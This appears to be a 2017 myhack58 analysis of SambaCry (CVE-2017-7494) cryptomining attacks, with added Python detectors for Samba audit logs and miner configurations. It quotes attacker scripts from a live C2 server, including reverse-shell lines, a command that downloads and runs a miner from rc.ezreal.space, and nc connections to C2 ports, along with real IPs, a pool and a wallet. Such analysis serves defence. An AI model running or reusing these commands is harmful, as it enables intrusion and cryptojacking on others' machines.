myhack58 | 佚名 (Anonymous) | MYHACK58:62201786995
History: Jun 13, 2017 - 12:00 a.m.

SambaCry exploit analysis - exploit alert - myhack58.com

2017-06-13 00:00:00
佚名 (Anonymous)
www.myhack58.com
9.8 High (CVSS3)
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High (CVSS2)
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C

EPSS: 0.973 High (Percentile 99.8%)

On May 24, 2017, Samba released version 4.6.4, fixing a serious remote code execution vulnerability, CVE-2017-7494. The vulnerability affects all Samba versions from 3.5.0 up to the fixed releases 4.6.4 / 4.5.10 / 4.4.14.

SambaCry is a wormable vulnerability capable of large-scale spread. Recently, Kaspersky Lab's honeypots captured an attack that exploits SambaCry to turn compromised hosts into bots for digital currency (bitcoin) mining.

Exploit
Because the vulnerability requires a writable SMB share, the attack packets captured by the Kaspersky Lab honeypot show the attacker first trying to write a file with a random name to the server, then deleting it once the write succeeds.
Having confirmed write permission, the attacker brute-forces the full path of the written file to discover the local path of the shared directory, and writes a malicious lib there as the payload.
Once the correct path is found, CVE-2017-7494 is used to load the malicious lib and execute commands. Because smbd runs as root by default, the commands run after loading the lib execute as root. After successful exploitation the written lib is deleted, and the malicious commands operate only in memory.
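The probe-write, library drop and cleanup sequence above leaves a recognisable trace in Samba's own audit log. As an added example that is not part of the article or of any of the samples, the Python below parses constructed syslog lines in vfs_full_audit style (assuming the default "%u|%I" prefix and the 2017-era pwrite/unlink operation names) and flags a client that writes a .so onto a share, or writes a file and then unlinks it again:

```python
import re
from collections import defaultdict

# Constructed syslog lines in Samba vfs_full_audit style (default "%u|%I" prefix);
# made up for this example, not taken from the article or the honeypot capture.
SAMPLE_LOG = """\
Jun 13 10:21:03 nas smbd_audit: nobody|203.0.113.7|connect|ok|public
Jun 13 10:21:03 nas smbd_audit: nobody|203.0.113.7|pwrite|ok|KxqwPzT
Jun 13 10:21:04 nas smbd_audit: nobody|203.0.113.7|unlink|ok|KxqwPzT
Jun 13 10:21:09 nas smbd_audit: nobody|203.0.113.7|pwrite|ok|INAebsGB.so
Jun 13 10:21:11 nas smbd_audit: nobody|203.0.113.7|unlink|ok|INAebsGB.so
Jun 13 10:25:40 nas smbd_audit: alice|192.0.2.10|pwrite|ok|reports/q2.docx
Jun 13 10:25:41 nas smbd_audit: alice|192.0.2.10|close|ok|reports/q2.docx
"""

AUDIT_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ [\d:]+) \S+ smbd_audit: "
    r"(?P<user>[^|]*)\|(?P<ip>[^|]*)\|(?P<op>[^|]*)\|(?P<res>[^|]*)\|(?P<arg>.*)$"
)

def parse_audit(text):
    """Yield one dict per parsable smbd_audit line; other lines are skipped."""
    for line in text.splitlines():
        m = AUDIT_RE.match(line)
        if m:
            yield m.groupdict()

def find_sambacry_pattern(text):
    """Return (ip, path, reason) findings for the probe-write / lib-drop / cleanup chain:
    a .so written onto a share, or a file written and later unlinked by the same client
    (in the captured attack both the probe file and the dropped lib are deleted again)."""
    findings = []
    written = defaultdict(set)  # client ip -> share paths it has written
    for ev in parse_audit(text):
        if ev["res"] != "ok":
            continue
        ip, op, path = ev["ip"], ev["op"], ev["arg"]
        if op == "pwrite":
            written[ip].add(path)
            if path.lower().endswith(".so"):
                findings.append((ip, path, "shared library written to share"))
        elif op == "unlink" and path in written[ip]:
            findings.append((ip, path, "write-then-delete by same client"))
    return findings

if __name__ == "__main__":
    for ip, path, why in find_sambacry_pattern(SAMPLE_LOG):
        print(f"{ip} {path}: {why}")
```

On a real file server the .so signal is the strong one; the write-then-delete signal is noisy on its own and is best used to corroborate it from the same client address.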
Malicious lib samples: 349d84b3b176bbc9834230351ef3bc2a_16106.so (INAebsGB.so) and 2009af3fed2a4704c224694dfc4b31dc_30361.so (cblRWuoCc.so).
Sample analysis
In INAebsGB.so the attacker uses /bin/sh to perform a very simple reverse shell, so as to execute the downloaded file or subsequent commands.
This lib turns out to be generated by the Metasploit is_known_pipename module.
Afterwards another lib, cblRWuoCc.so, is written. In this lib the attacker bounces a shell to port 4000 of the C2 server and downloads a mining program, using the bot as a CPU miner. From this sample we located the C2 server and the mining program.
The actions it performs:

bash -i
The attacker downloads http://rc.ezreal.space/minerd64_s, stores it as /tmp/m, grants it execute permission and runs it with nohup.
A simple lookup of the C2 server gives:
rc.ezreal.space
A record: 149.255.35.33

Time        IP              Country   Province/State   Operator
2017-05-17  149.255.35.33   USA       Illinois         swiftway.net
2017-05-15  149.255.35.33   USA       Illinois         swiftway.net
2017-04-30  185.86.150.76   Sweden    Ciotat           Poland

www.ezreal.space   191.101.31.100
cl.ezreal.space    191.101.31.100
rc2.ezreal.space   149.255.35.77
rc.ezreal.space    149.255.35.33
Typo hacker?
When I connected to port 4000 of the C2 server rc.ezreal.space, I saw the following script:
#!/usr/bin/env bash
host='149.255.35.33';
nohup bash -i
nohuo bash -i
nohuo bash -i
The attacker wanted nohup to ignore the hang-up signal so the shell keeps running in the background, but, whether from carelessness or a slip of the hand, typed nohup as nohuo.
Connecting to the other three ports yields a few more scripts:
➜ /tmp nc 149.255.35.33 4001
#!/usr/bin/env bash
#minerd script
host='149.255.35.33';
target=$RANDOM; target+=.so; target=/tmp/$target;
cat $target && chmod +x $target && nohup $target &
➜ /tmp nc 149.255.35.33 4002
#!/usr/bin/env bash
(process guard script)
➜ /tmp nc 149.255.35.33 4003
#!/usr/bin/env bash
(auto start script)

The miner program served on C2 port 5000 is identical to the one downloaded over HTTP.
Miner analysis
As of now the C2 server is still alive. Downloading minerd64_s and analysing it briefly shows it is the common CPU mining program minerd. Unlike normal usage, however, the attacker passes no extra command-line parameters; all the parameters needed to run are hard-coded into the program.
Here we quickly find the attacker's mining pool and wallet address:
.rodata:0000000000515604 00000026 C stratum+tcp://xmr.crypto-pool.fr:3333
.rodata:00000000005156CC 00000060 C 43xtViRHn1oibjS6yZSgS6XhFFkSRGC5shgmymh6ei4r5osjprc1z85beczs89ztl4idgdouheoktcve115wp7sb6xzhmgy
Querying the transactions at the pool shows the attacker is mining the altcoins XDN and XMR; looking at recent payouts, the earnings are quite nice :)
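Because the pool and wallet are hard-coded rather than passed as arguments, they can be pulled straight out of the binary's strings, together with their offsets, much like the .rodata listing above. The Python below is an added example, not the article's tooling: it scans raw bytes for stratum URLs and standard 95-character Monero mainnet addresses (leading 4; subaddresses with a leading 8 are not covered), using a constructed byte blob that contains the pool URL from the article and a made-up wallet:

```python
import re

B58 = rb"[1-9A-HJ-NP-Za-km-z]"
# Standard Monero mainnet address: a leading '4' plus 94 base58 chars (95 total),
# not embedded in a longer base58 run. Subaddresses (leading '8') are not matched.
XMR_ADDR_RE = re.compile(rb"(?<!" + B58 + rb")4" + B58 + rb"{94}(?!" + B58 + rb")")
STRATUM_RE = re.compile(rb"stratum\+(?:tcp|ssl)://[A-Za-z0-9.\-]+:\d{2,5}")

# Constructed stand-in for a miner's .rodata: NUL-separated strings plus filler bytes.
# The pool URL is the one the article found; the wallet is made up (95 base58 chars).
FAKE_WALLET = "4" + "AbC1" * 23 + "xy"
SAMPLE_RODATA = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9            # 16 bytes of fake ELF header
    + b"stratum+tcp://xmr.crypto-pool.fr:3333\x00"  # 37 chars + NUL, as 0x26 in the listing
    + FAKE_WALLET.encode() + b"\x00"
    + b"Usage: minerd [OPTIONS]\x00"
    + bytes(range(256))                             # every byte value, to exercise the regexes
)

def extract_miner_config(blob):
    """Return (offset, value) pairs for stratum pools and Monero addresses found in raw bytes."""
    return {
        "pools": [(m.start(), m.group().decode()) for m in STRATUM_RE.finditer(blob)],
        "wallets": [(m.start(), m.group().decode()) for m in XMR_ADDR_RE.finditer(blob)],
    }

def extract_miner_config_from_file(path):
    """Same extraction over a file on disk, e.g. a downloaded minerd sample."""
    with open(path, "rb") as f:
        return extract_miner_config(f.read())

if __name__ == "__main__":
    for kind, hits in extract_miner_config(SAMPLE_RODATA).items():
        for offset, value in hits:
            print(f"{kind}: 0x{offset:08x} {value}")
```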
Another attack
Just when we thought our analysis did not differ from Kaspersky's and were ready to go home for the day, we found that the 360 tracking team had also provided a sample, 1bb17e0d03ebd5acafbe60b70e38dec4.so (oooo.so).
This lib is very similar to cblRWuoCc.so, but the operation it performs is different.
